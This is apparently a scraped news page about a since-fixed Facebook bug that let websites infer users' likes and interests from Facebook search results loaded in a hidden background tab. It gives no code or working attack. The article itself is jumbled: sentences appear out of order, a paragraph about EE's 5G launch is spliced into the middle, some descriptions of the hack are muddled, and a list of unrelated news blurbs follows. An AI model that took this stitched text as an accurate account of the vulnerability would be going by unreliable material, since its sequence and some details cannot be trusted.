Facebook vulnerability could have let websites obtain users' interests

Facebook vulnerability could have let websites obtain users' interests

Facebook says it has fixed a privacy bug that allowed websites to read likes and interests on users' profiles without them knowing about it.

He realized that just by looking for an iframe inside the search results page, he could just easily determine if a search query has returned a positive or negative result.

Facebook fixed the issue in May and there's no indication that the flaw was successfully exploited by hackers.

Masas told ZDNet that an attacker could use a technique called "tab under" to force the opening of the Facebook Search page inside a background tab, which keeps the user's focus on the main malicious page -which could be disguised as an online game, movie streaming portal, or news article.

Ankush Johar, Director at Infosec Ventures explained, "Although CSRF flaws have a big prerequisite to work that the user must be logged in to the website while he/she visits the infected page, what makes the Facebook vulnerability risky is, unlike other websites, most of the users are always logged into Facebook in their browsers thus putting everyone at massive risks".

Facebook is not the only company which has faced this type of issue and it seems no one took advantage of this particular vulnerability. Notably, because these searches would appear to be conducted by the user, whose login and browser had been authenticated by Facebook, search results wouldn't be affected by the user's privacy settings.

EE announces plans to launch 5G in Edinburgh
This will help 5G make the biggest difference - even with the biggest crowds often witnessed at these locations. BT Group PLC on Tuesday said its unit EE will launch 5G mobile technology in 16 United Kingdom cities in 2019.

This is the latest revelation in Facebook's bug-filled year. This could also be used to search for a user's post with certain keywords among other complex tasks, all of which are usually visible to only those who are in the friend list of the user. The bug allowed websites to obtain private information about Facebook users and their friends through unauthorized access to a company API, playing off a specific behavior in the Chrome browser.

A video demonstrating how the hack works shows a pop-up window where the attackers type in the questions.

These search queries, even if they didn't expose fine-grained details, they did expose second-hand information that could reveal, when pieced together, the identity of a user and his friends circle.

"We appreciate this researcher's report to our bug bounty program".

The company awarded Imperva $8,000 in two separate bug bounty rewards.

Related News:



Most liked

Johnny Bobbitt arrested in Philadelphia, charges expected in GoFundMe case
Over the summer an attorney for Bobbitt accused the couple if mismanaging a large portion of the donations. According to a report at NBC Philadelphia , the entire Johnny Bobbitt story was a scam from the beginning.

Facebook management apparently ordered to ditch their iPhones for Android
Cook has made critical comments about the 87 million Facebook users who had their data unknowingly accessed by a political firm. After it was criticised by Apple CEO Tim Cook, it appears that the management isn't taking his remarks too lightly.

'Jack Reacher' TV Series in the Works, Without Tom Cruise
The author continued: "So what I've made a decision to do is - there won't be any more movies with Tom Cruise ". With that in mind, he will not be recruited for a reboot of the series that will come in television series form.

Hazard pays tribute to the player behind his Chelsea move
The midfielder made his name at West Ham and joined Chelsea in 2003, where he spent seven trophy-laden years at Stamford Bridge. In his Instagram post, Cole thanked the countless people who had helped him through the football path. 'He was right.

Mithali Raj guides India to win over Pakistan
In the first ball of the 18th over, Bismah Maroof and Nida Dar were at the crease when they were docked 5 runs for the first time. India's chase was made easier by 10 penalty runs awarded to them at the start of their innings.

Wayne Rooney to captain England in farewell friendly match against the USA
Speaking about his time at Man United, Goal quoted Rooney as saying: "Of course you miss it. The more important thing is that within the England group, we value what he has done.

Black Friday Week PS4 discounts announced
Select DualShock 4 wireless controllers available for $39.99 USD (MSRP) / $49.99 CAN (MSRP) at participating retailers . Sony's video game service will be on sale with discounts on the 12-month subscription.

How to watch the DP World Tour Championship without Sky Sports
Molinari holds a lead of more than one million points in the race and only Tommy Fleetwood , the defending champion, can stop him.

Saudi Arabia seeks death penalty for five over Jamal Khashoggi death
Others have argued it's hard to believe the killing would have taken place without Crown Prince Mohammed bin Salman's knowledge. The prosecutor told reporters in Riyadh that investigations were still ongoing to locate the remains of the slain journalist.

The new John Lewis Christmas advert featuring Elton John
This year department store rival Debenhams was criticised for releasing a Christmas advert similar to John Lewis's 2017 offering. And it looks like fans were bang on, as the advert follows how one gift inspired a little boy's entire life.

Canada in talks with Pakistan over possibly taking in Asia Bibi
Pakistan yesterday rubbished rumours about Christian woman Aasia Bibi's travel overseas after her acquittal in a blasphemy case. Bibi's conviction stemmed from a 2009 incident when she was asked to fetch water while out working in the fields.

Barack and Michelle Obama Will Return to Hyde Park for Publicity Events
The book describes Obama's upbringing on Chicago's South Side, as well as her time at Whitney Young and Princeton University. She also revealed how she underwent IVF in order to give birth to Malia , now 20 years old, and Sasha, now 17.

At least 8 killed in Saudi-led airstrike on Yemen's Hodeidah: Houthis
Three port employees reached by telephone said the rebels had also begun to mine entryways to the port overnight. Rebel-controlled media reported two air strikes but made no mention of casualties.

SAP Makes Waves on Buying Qualtrics
It doesn't say, why does the customer feel a certain way about your brand, about your products, and about their experience. Qualtrics expects 2018 revenue in excess of $400 million and forecast a forward growth rate of more than 40 percent.

Marko Arnautovic could leave West Ham for Champions League football
Spurs have become Champions League regulars in recent years and they should plot a move for West Ham's 6ft 3in attacking enforcer. Highlights from West Ham's win over Burnley in the Premier League. "It's clear that I want to compete with the best players".